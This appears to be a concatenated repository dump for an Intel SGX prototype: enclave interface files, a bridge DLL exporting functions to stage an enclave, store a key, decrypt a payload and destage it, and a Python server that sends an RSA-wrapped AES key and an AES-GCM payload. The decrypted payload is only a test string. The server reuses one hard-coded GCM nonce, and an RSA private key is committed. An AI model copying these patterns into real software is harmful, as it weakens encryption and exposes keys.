ecall_do_trusted(sgx_enclave_id_t eid, int* retval, int check); 43 | sgx_status_t createRsaKeyPairEcall(sgx_enclave_id_t eid, char* public_key_raw_out, char* public_key_out, unsigned int KEY_SIZE); 44 | sgx_status_t decryptPayloadEcall(sgx_enclave_id_t eid, unsigned char* encrypted_payload, size_t encrypted_payload_len); 45 | sgx_status_t decryptPayloadGetSizeEcall(sgx_enclave_id_t eid, unsigned char* encrypted_payload, size_t encrypted_payload_len, size_t* decrypted_payload_len); 46 | sgx_status_t ecall_do_trusted_inside_ocall(sgx_enclave_id_t eid, int* retval); 47 | 48 | #ifdef __cplusplus 49 | } 50 | #endif /* __cplusplus */ 51 | 52 | #endif 53 | -------------------------------------------------------------------------------- /Enclave2/Enclave2.edl: -------------------------------------------------------------------------------- 1 | enclave { 2 | from "sgx_tstdc.edl" import *; 3 | 4 | trusted { 5 | /* define ECALLs here. */ 6 | public int ecall_do_trusted(int check); // public ECALL 7 | public void createRsaKeyPairEcall([out, size=384] char* public_key_raw_out, 8 | [out, size=388]char* public_key_out); 9 | public void storeSymKeyEcall( 10 | [in, size=encrypted_payload_len] unsigned char* encrypted_payload, size_t encrypted_payload_len); 11 | public void decryptPayloadEcall( 12 | [in, size=encrypted_payload_len] unsigned char* encrypted_payload, 13 | size_t encrypted_payload_len, 14 | [in, size=16] unsigned char* mac); 15 | 16 | /*public void decryptPayloadGetSizeEcall( 17 | [in, size=encrypted_payload_len] unsigned char* encrypted_payload, 18 | size_t encrypted_payload_len, 19 | [in, out] size_t *decrypted_payload_len); 20 | */ 21 | int ecall_do_trusted_inside_ocall(void); // private ECALL, can only be invoked by OCALLs (see `allow` in untrusted`) 22 | }; 23 | 24 | untrusted { 25 | /* define OCALLs here. */ 26 | /* 27 | * ocall_do_trusted - invokes OCALL to display string buffer inside the enclave. 28 | * [in]: copy the string buffer to App outside. 29 | * [string]: specifies 'str' is a NULL terminated buffer. 30 | 31 | * in: [in] means the parameter should be passed from the caller to the callee. 32 | * out: [out] means the parameter should be returned from the callee to the caller. 33 | * [in, out] means the parameter can be propogated in both directions. 34 | * count: [count=n] means the number of elements that will be copied to or from this pointer is n. By default, n is set to 1. 35 | * string: [in, string] means you are passing in a NULL-terminated string. Note string can not be combined with the out keyword. 36 | */ 37 | void ocall_print([in, string] const char *str) allow (ecall_do_trusted_inside_ocall); 38 | }; 39 | }; 40 | -------------------------------------------------------------------------------- /Enclave2/Enclave2_private.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | 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 39 | -----END RSA PRIVATE KEY----- -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /App/base64.cpp: -------------------------------------------------------------------------------- 1 | #include "base64.h" 2 | #include 3 | 4 | static const std::string base64_chars = 5 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 6 | "abcdefghijklmnopqrstuvwxyz" 7 | "0123456789+/"; 8 | 9 | 10 | static inline bool is_base64(BYTE c) { 11 | return (isalnum(c) || (c == '+') || (c == '/')); 12 | } 13 | 14 | std::string base64_encode(BYTE const* buf, unsigned int bufLen) { 15 | std::string ret; 16 | int i = 0; 17 | int j = 0; 18 | BYTE char_array_3[3]; 19 | BYTE char_array_4[4]; 20 | 21 | while (bufLen--) { 22 | char_array_3[i++] = *(buf++); 23 | if (i == 3) { 24 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; 25 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); 26 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); 27 | char_array_4[3] = char_array_3[2] & 0x3f; 28 | 29 | for (i = 0; (i < 4); i++) 30 | ret += base64_chars[char_array_4[i]]; 31 | i = 0; 32 | } 33 | } 34 | 35 | if (i) 36 | { 37 | for (j = i; j < 3; j++) 38 | char_array_3[j] = '\0'; 39 | 40 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; 41 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); 42 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); 43 | char_array_4[3] = char_array_3[2] & 0x3f; 44 | 45 | for (j = 0; (j < i + 1); j++) 46 | ret += base64_chars[char_array_4[j]]; 47 | 48 | while ((i++ < 3)) 49 | ret += '='; 50 | } 51 | 52 | return ret; 53 | } 54 | 55 | std::vector base64_decode(std::string const& encoded_string) { 56 | int in_len = static_cast(encoded_string.size()); 57 | int i = 0; 58 | int j = 0; 59 | int in_ = 0; 60 | BYTE char_array_4[4], char_array_3[3]; 61 | std::vector ret; 62 | 63 | while (in_len-- && (encoded_string[in_] != '=') && is_base64(encoded_string[in_])) { 64 | char_array_4[i++] = encoded_string[in_]; in_++; 65 | if (i == 4) { 66 | for (i = 0; i < 4; i++) 67 | char_array_4[i] = static_cast(base64_chars.find(char_array_4[i])); 68 | 69 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4); 70 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2); 71 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3]; 72 | 73 | for (i = 0; (i < 3); i++) 74 | ret.push_back(char_array_3[i]); 75 | i = 0; 76 | } 77 | } 78 | 79 | if (i) { 80 | for (j = i; j < 4; j++) 81 | char_array_4[j] = 0; 82 | 83 | for (j = 0; j < 4; j++) 84 | char_array_4[j] = static_cast(base64_chars.find(char_array_4[j])); 85 | 86 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4); 87 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2); 88 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3]; 89 | 90 | for (j = 0; (j < i - 1); j++) ret.push_back(char_array_3[j]); 91 | } 92 | 93 | return ret; 94 | } -------------------------------------------------------------------------------- /Server/main.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import json 4 | import base64 5 | 6 | from io import StringIO 7 | 8 | from Crypto.PublicKey import RSA 9 | from Crypto.Cipher import PKCS1_OAEP, AES 10 | from Crypto.Hash import SHA256 11 | from Crypto.Random import get_random_bytes 12 | from Crypto.Protocol.KDF import PBKDF2 13 | 14 | import hexdump 15 | import uuid 16 | 17 | import cherrypy 18 | from cherrypy.process.plugins import PIDFile 19 | 20 | config = { 21 | "symkey": { 22 | "key": bytes(), 23 | "len": 0, 24 | "mac": bytes() 25 | } 26 | } 27 | 28 | 29 | def do_payload(): 30 | print("SymKey generated:") 31 | hexdump.hexdump(config["symkey"]["key"]) 32 | print("SymKey len: ", config["symkey"]["len"]) 33 | 34 | test_string = """ 35 | Where does it come from? 36 | """ 37 | print("Length of plain payload is: ", len(test_string)) 38 | 39 | nonce = b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C' 40 | b64cipher = str(base64.b64encode(config["symkey"]["key"]), 'utf-8') 41 | cipher = AES.new(key=config["symkey"]["key"], 42 | mode=AES.MODE_GCM, 43 | nonce=nonce) 44 | 45 | encryptedData, tag = cipher.encrypt_and_digest(test_string.encode('utf-8')) 46 | print("Length of encrypted payload is: ", len(encryptedData)) 47 | print("Tag is: {0} len: {1}".format(tag, len(tag))) 48 | 49 | tagB64 = str(base64.b64encode(tag), 'utf-8') 50 | encryptedDataB64 = str(base64.b64encode(encryptedData), 'utf-8') 51 | response = { 52 | "payload": encryptedDataB64, 53 | "len": len(encryptedData), 54 | "mac": tagB64 55 | } 56 | return response 57 | 58 | 59 | def do_symkey(data): 60 | public_key = json.loads(data) 61 | exp = base64.b64decode(public_key["exp"]) 62 | mod = base64.b64decode(public_key["mod"]) 63 | 64 | print("Extracting mod and exp") 65 | n = int.from_bytes(mod, byteorder="little") 66 | e = int.from_bytes(exp, byteorder="little") 67 | key_params = (n, e) 68 | 69 | print("Constructing RSA key") 70 | pub_key = RSA.construct(key_params) 71 | 72 | print("Exporting public key to PEM") 73 | pub_key_pem = pub_key.exportKey().decode('ascii') 74 | pem_fpath = "keys/sgxRSApub.pem" 75 | export_pk_pem(pem_fpath, pub_key_pem) 76 | 77 | print("Creating AES Symmetric Key from token") 78 | salt = get_random_bytes(16) # AES-GCM-128 79 | token = str(uuid.uuid4()) 80 | 81 | symkey = PBKDF2(token, salt, dkLen=16) 82 | print("SymKey generated:") 83 | hexdump.hexdump(symkey) 84 | print("SymKey len: ", len(symkey)) 85 | config["symkey"]["key"] = symkey 86 | config["symkey"]["len"] = len(symkey) 87 | 88 | print("Encrypting SymKey with RSA Pub Key") 89 | cipher = PKCS1_OAEP.new(pub_key, SHA256) 90 | ciphertext = cipher.encrypt(symkey) 91 | 92 | print("RSA Ciphertext of symkey:") 93 | hexdump.hexdump(ciphertext) 94 | print("RSA Ciphertext len: ", len(ciphertext)) 95 | 96 | print("B64 encoding ciphertext") 97 | b64cipher = str(base64.b64encode(ciphertext), 'utf-8') 98 | response = { 99 | "key": b64cipher, 100 | "len": len(ciphertext) 101 | } 102 | return response 103 | 104 | 105 | class SGXServer(object): 106 | exposedViewPaths = {} 107 | 108 | @cherrypy.expose 109 | @cherrypy.tools.json_out() 110 | @cherrypy.tools.json_in() 111 | def symkey(self): 112 | jdata = json.dumps(cherrypy.request.json) 113 | eResponse = do_symkey(jdata) 114 | return eResponse 115 | 116 | @cherrypy.expose 117 | @cherrypy.tools.json_out() 118 | def payload(self): 119 | eResponse = do_payload() 120 | return eResponse 121 | 122 | 123 | def export_pk_pem(path, pubkey): 124 | with open(path, "w") as f: 125 | f.write(pubkey) 126 | 127 | 128 | if __name__ == '__main__': 129 | cherrypy.config.update((os.path.join(os.curdir, "server.conf"))) 130 | 131 | app = SGXServer() 132 | 133 | # Daemonizer(cherrypy.engine).subscribe() 134 | PIDFile(cherrypy.engine, 'sgx.pid').subscribe() 135 | 136 | cherrypy.tree.mount(app, '/', config=os.path.join( 137 | os.curdir, "apps", "sgx.conf")) 138 | 139 | cherrypy.engine.start() 140 | cherrypy.engine.block() 141 | -------------------------------------------------------------------------------- /Bridge/Bridge.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef _BRIDGE_H_ 3 | #define _BRIDGE_H_ 4 | 5 | 6 | #define WIN32_LEAN_AND_MEAN 7 | #include 8 | #include 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include "sgx_error.h" 18 | #include "sgx_eid.h" 19 | 20 | #include "sgx_capable.h" 21 | #include "sgx_urts.h" 22 | #include "sgx_tcrypto.h" 23 | 24 | #include "Enclave2_u.h" 25 | 26 | #ifndef TRUE 27 | # define TRUE 1 28 | #endif 29 | 30 | #ifndef FALSE 31 | # define FALSE 0 32 | #endif 33 | 34 | #define CANNOT_CONTINUE FALSE 35 | #define CAN_CONTINUE TRUE 36 | 37 | #pragma comment( lib, "sgx_capable" ) 38 | 39 | 40 | typedef struct _sgx_errlist_t { 41 | sgx_status_t err; 42 | const char* msg; 43 | const char* sug; /* Suggestion */ 44 | } sgx_errlist_t; 45 | 46 | /* Error code returned by sgx_create_enclave */ 47 | static sgx_errlist_t sgx_errlist[] = { 48 | { 49 | SGX_ERROR_UNEXPECTED, 50 | "Unexpected error occurred.", 51 | NULL 52 | }, 53 | { 54 | SGX_ERROR_INVALID_PARAMETER, 55 | "Invalid parameter.", 56 | NULL 57 | }, 58 | { 59 | SGX_ERROR_OUT_OF_MEMORY, 60 | "Out of memory.", 61 | NULL 62 | }, 63 | { 64 | SGX_ERROR_ENCLAVE_LOST, 65 | "Power transition occurred.", 66 | "Please refer to the sample \"PowerTransition\" for details." 67 | }, 68 | { 69 | SGX_ERROR_INVALID_ENCLAVE, 70 | "Invalid enclave image.", 71 | NULL 72 | }, 73 | { 74 | SGX_ERROR_INVALID_ENCLAVE_ID, 75 | "Invalid enclave identification.", 76 | NULL 77 | }, 78 | { 79 | SGX_ERROR_INVALID_SIGNATURE, 80 | "Invalid enclave signature.", 81 | NULL 82 | }, 83 | { 84 | SGX_ERROR_OUT_OF_EPC, 85 | "Out of EPC memory.", 86 | NULL 87 | }, 88 | { 89 | SGX_ERROR_NO_DEVICE, 90 | "Invalid SGX device.", 91 | "Please make sure SGX module is enabled in the BIOS, and install SGX driver afterwards." 92 | }, 93 | { 94 | SGX_ERROR_MEMORY_MAP_CONFLICT, 95 | "Memory map conflicted.", 96 | NULL 97 | }, 98 | { 99 | SGX_ERROR_INVALID_METADATA, 100 | "Invalid enclave metadata.", 101 | NULL 102 | }, 103 | { 104 | SGX_ERROR_DEVICE_BUSY, 105 | "SGX device was busy.", 106 | NULL 107 | }, 108 | { 109 | SGX_ERROR_INVALID_VERSION, 110 | "Enclave version was invalid.", 111 | NULL 112 | }, 113 | { 114 | SGX_ERROR_INVALID_ATTRIBUTE, 115 | "Enclave was not authorized.", 116 | NULL 117 | }, 118 | { 119 | SGX_ERROR_ENCLAVE_FILE_ACCESS, 120 | "Can't open enclave file.", 121 | NULL 122 | }, 123 | { 124 | SGX_ERROR_MAC_MISMATCH, 125 | "Enc/Dec MAC mismatch", 126 | NULL 127 | }, 128 | 129 | }; 130 | 131 | sgx_enclave_id_t enclaveId; 132 | sgx_status_t ret; 133 | 134 | #if defined(__cplusplus) 135 | extern "C" { 136 | #endif 137 | // internal 138 | // utility 139 | void DumpHex(const void* data, size_t size); 140 | void buf2hex(uint8_t* buf, unsigned int sz); 141 | void WriteBufFile(const char* fileName, char* buf, size_t sz); 142 | int readBin(const char* bin_file_name, unsigned char** buffer); 143 | void print_error_message(sgx_status_t ret); 144 | 145 | sgx_enclave_id_t createEnclave(char* encalaveSignedFile); 146 | 147 | // ocalls 148 | void ocall_print(const char* str); 149 | 150 | // exported 151 | int __declspec(dllexport) enableSGXEFI(); 152 | int __declspec(dllexport) checkECapability(); 153 | uint64_t __declspec(dllexport) initEnclave(char* enclaveSignedFile); 154 | int __declspec(dllexport) genPair(uint64_t eid, char** public_key_struct); 155 | int __declspec(dllexport) storeSymKey(uint64_t eid, unsigned char* encData); 156 | int __declspec(dllexport) decryptPayload(uint64_t eid, unsigned char* encData, size_t encDataSz, unsigned char* mac); 157 | int __declspec(dllexport) destageEnclave(uint64_t eid); 158 | #if defined(__cplusplus) 159 | } 160 | #endif 161 | 162 | #endif /* !_BRIDGE_H_ */ 163 | -------------------------------------------------------------------------------- /Bridge/Enclave2_u.c: -------------------------------------------------------------------------------- 1 | #include "Enclave2_u.h" 2 | #include 3 | 4 | typedef struct ms_ecall_do_trusted_t { 5 | int ms_retval; 6 | int ms_check; 7 | } ms_ecall_do_trusted_t; 8 | 9 | typedef struct ms_createRsaKeyPairEcall_t { 10 | char* ms_public_key_raw_out; 11 | char* ms_public_key_out; 12 | } ms_createRsaKeyPairEcall_t; 13 | 14 | typedef struct ms_storeSymKeyEcall_t { 15 | unsigned char* ms_encrypted_payload; 16 | size_t ms_encrypted_payload_len; 17 | } ms_storeSymKeyEcall_t; 18 | 19 | typedef struct ms_decryptPayloadEcall_t { 20 | unsigned char* ms_encrypted_payload; 21 | size_t ms_encrypted_payload_len; 22 | unsigned char* ms_mac; 23 | } ms_decryptPayloadEcall_t; 24 | 25 | typedef struct ms_ecall_do_trusted_inside_ocall_t { 26 | int ms_retval; 27 | } ms_ecall_do_trusted_inside_ocall_t; 28 | 29 | typedef struct ms_ocall_print_t { 30 | const char* ms_str; 31 | } ms_ocall_print_t; 32 | 33 | typedef struct ms_sgx_oc_cpuidex_t { 34 | int* ms_cpuinfo; 35 | int ms_leaf; 36 | int ms_subleaf; 37 | } ms_sgx_oc_cpuidex_t; 38 | 39 | typedef struct ms_sgx_thread_wait_untrusted_event_ocall_t { 40 | int ms_retval; 41 | const void* ms_self; 42 | } ms_sgx_thread_wait_untrusted_event_ocall_t; 43 | 44 | typedef struct ms_sgx_thread_set_untrusted_event_ocall_t { 45 | int ms_retval; 46 | const void* ms_waiter; 47 | } ms_sgx_thread_set_untrusted_event_ocall_t; 48 | 49 | typedef struct ms_sgx_thread_setwait_untrusted_events_ocall_t { 50 | int ms_retval; 51 | const void* ms_waiter; 52 | const void* ms_self; 53 | } ms_sgx_thread_setwait_untrusted_events_ocall_t; 54 | 55 | typedef struct ms_sgx_thread_set_multiple_untrusted_events_ocall_t { 56 | int ms_retval; 57 | const void** ms_waiters; 58 | size_t ms_total; 59 | } ms_sgx_thread_set_multiple_untrusted_events_ocall_t; 60 | 61 | static sgx_status_t SGX_CDECL Enclave2_ocall_print(void* pms) 62 | { 63 | ms_ocall_print_t* ms = SGX_CAST(ms_ocall_print_t*, pms); 64 | ocall_print(ms->ms_str); 65 | 66 | return SGX_SUCCESS; 67 | } 68 | 69 | static sgx_status_t SGX_CDECL Enclave2_sgx_oc_cpuidex(void* pms) 70 | { 71 | ms_sgx_oc_cpuidex_t* ms = SGX_CAST(ms_sgx_oc_cpuidex_t*, pms); 72 | sgx_oc_cpuidex(ms->ms_cpuinfo, ms->ms_leaf, ms->ms_subleaf); 73 | 74 | return SGX_SUCCESS; 75 | } 76 | 77 | static sgx_status_t SGX_CDECL Enclave2_sgx_thread_wait_untrusted_event_ocall(void* pms) 78 | { 79 | ms_sgx_thread_wait_untrusted_event_ocall_t* ms = SGX_CAST(ms_sgx_thread_wait_untrusted_event_ocall_t*, pms); 80 | ms->ms_retval = sgx_thread_wait_untrusted_event_ocall(ms->ms_self); 81 | 82 | return SGX_SUCCESS; 83 | } 84 | 85 | static sgx_status_t SGX_CDECL Enclave2_sgx_thread_set_untrusted_event_ocall(void* pms) 86 | { 87 | ms_sgx_thread_set_untrusted_event_ocall_t* ms = SGX_CAST(ms_sgx_thread_set_untrusted_event_ocall_t*, pms); 88 | ms->ms_retval = sgx_thread_set_untrusted_event_ocall(ms->ms_waiter); 89 | 90 | return SGX_SUCCESS; 91 | } 92 | 93 | static sgx_status_t SGX_CDECL Enclave2_sgx_thread_setwait_untrusted_events_ocall(void* pms) 94 | { 95 | ms_sgx_thread_setwait_untrusted_events_ocall_t* ms = SGX_CAST(ms_sgx_thread_setwait_untrusted_events_ocall_t*, pms); 96 | ms->ms_retval = sgx_thread_setwait_untrusted_events_ocall(ms->ms_waiter, ms->ms_self); 97 | 98 | return SGX_SUCCESS; 99 | } 100 | 101 | static sgx_status_t SGX_CDECL Enclave2_sgx_thread_set_multiple_untrusted_events_ocall(void* pms) 102 | { 103 | ms_sgx_thread_set_multiple_untrusted_events_ocall_t* ms = SGX_CAST(ms_sgx_thread_set_multiple_untrusted_events_ocall_t*, pms); 104 | ms->ms_retval = sgx_thread_set_multiple_untrusted_events_ocall(ms->ms_waiters, ms->ms_total); 105 | 106 | return SGX_SUCCESS; 107 | } 108 | 109 | static const struct { 110 | size_t nr_ocall; 111 | void * func_addr[6]; 112 | } ocall_table_Enclave2 = { 113 | 6, 114 | { 115 | (void*)(uintptr_t)Enclave2_ocall_print, 116 | (void*)(uintptr_t)Enclave2_sgx_oc_cpuidex, 117 | (void*)(uintptr_t)Enclave2_sgx_thread_wait_untrusted_event_ocall, 118 | (void*)(uintptr_t)Enclave2_sgx_thread_set_untrusted_event_ocall, 119 | (void*)(uintptr_t)Enclave2_sgx_thread_setwait_untrusted_events_ocall, 120 | (void*)(uintptr_t)Enclave2_sgx_thread_set_multiple_untrusted_events_ocall, 121 | } 122 | }; 123 | 124 | sgx_status_t ecall_do_trusted(sgx_enclave_id_t eid, int* retval, int check) 125 | { 126 | sgx_status_t status; 127 | ms_ecall_do_trusted_t ms; 128 | ms.ms_check = check; 129 | status = sgx_ecall(eid, 0, &ocall_table_Enclave2, &ms); 130 | if (status == SGX_SUCCESS && retval) *retval = ms.ms_retval; 131 | return status; 132 | } 133 | 134 | sgx_status_t createRsaKeyPairEcall(sgx_enclave_id_t eid, char* public_key_raw_out, char* public_key_out) 135 | { 136 | sgx_status_t status; 137 | ms_createRsaKeyPairEcall_t ms; 138 | ms.ms_public_key_raw_out = public_key_raw_out; 139 | ms.ms_public_key_out = public_key_out; 140 | status = sgx_ecall(eid, 1, &ocall_table_Enclave2, &ms); 141 | return status; 142 | } 143 | 144 | sgx_status_t storeSymKeyEcall(sgx_enclave_id_t eid, unsigned char* encrypted_payload, size_t encrypted_payload_len) 145 | { 146 | sgx_status_t status; 147 | ms_storeSymKeyEcall_t ms; 148 | ms.ms_encrypted_payload = encrypted_payload; 149 | ms.ms_encrypted_payload_len = encrypted_payload_len; 150 | status = sgx_ecall(eid, 2, &ocall_table_Enclave2, &ms); 151 | return status; 152 | } 153 | 154 | sgx_status_t decryptPayloadEcall(sgx_enclave_id_t eid, unsigned char* encrypted_payload, size_t encrypted_payload_len, unsigned char* mac) 155 | { 156 | sgx_status_t status; 157 | ms_decryptPayloadEcall_t ms; 158 | ms.ms_encrypted_payload = encrypted_payload; 159 | ms.ms_encrypted_payload_len = encrypted_payload_len; 160 | ms.ms_mac = mac; 161 | status = sgx_ecall(eid, 3, &ocall_table_Enclave2, &ms); 162 | return status; 163 | } 164 | 165 | sgx_status_t ecall_do_trusted_inside_ocall(sgx_enclave_id_t eid, int* retval) 166 | { 167 | sgx_status_t status; 168 | ms_ecall_do_trusted_inside_ocall_t ms; 169 | status = sgx_ecall(eid, 4, &ocall_table_Enclave2, &ms); 170 | if (status == SGX_SUCCESS && retval) *retval = ms.ms_retval; 171 | return status; 172 | } 173 | 174 | -------------------------------------------------------------------------------- /App/Enclave2_u.c: -------------------------------------------------------------------------------- 1 | #include "Enclave2_u.h" 2 | #include 3 | 4 | typedef struct ms_ecall_do_trusted_t { 5 | int ms_retval; 6 | int ms_check; 7 | } ms_ecall_do_trusted_t; 8 | 9 | typedef struct ms_createRsaKeyPairEcall_t { 10 | char* ms_public_key_raw_out; 11 | char* ms_public_key_out; 12 | unsigned int ms_KEY_SIZE; 13 | } ms_createRsaKeyPairEcall_t; 14 | 15 | typedef struct ms_decryptPayloadEcall_t { 16 | unsigned char* ms_encrypted_payload; 17 | size_t ms_encrypted_payload_len; 18 | } ms_decryptPayloadEcall_t; 19 | 20 | typedef struct ms_decryptPayloadGetSizeEcall_t { 21 | unsigned char* ms_encrypted_payload; 22 | size_t ms_encrypted_payload_len; 23 | size_t* ms_decrypted_payload_len; 24 | } ms_decryptPayloadGetSizeEcall_t; 25 | 26 | typedef struct ms_ecall_do_trusted_inside_ocall_t { 27 | int ms_retval; 28 | } ms_ecall_do_trusted_inside_ocall_t; 29 | 30 | typedef struct ms_ocall_print_t { 31 | const char* ms_str; 32 | } ms_ocall_print_t; 33 | 34 | typedef struct ms_sgx_oc_cpuidex_t { 35 | int* ms_cpuinfo; 36 | int ms_leaf; 37 | int ms_subleaf; 38 | } ms_sgx_oc_cpuidex_t; 39 | 40 | typedef struct ms_sgx_thread_wait_untrusted_event_ocall_t { 41 | int ms_retval; 42 | const void* ms_self; 43 | } ms_sgx_thread_wait_untrusted_event_ocall_t; 44 | 45 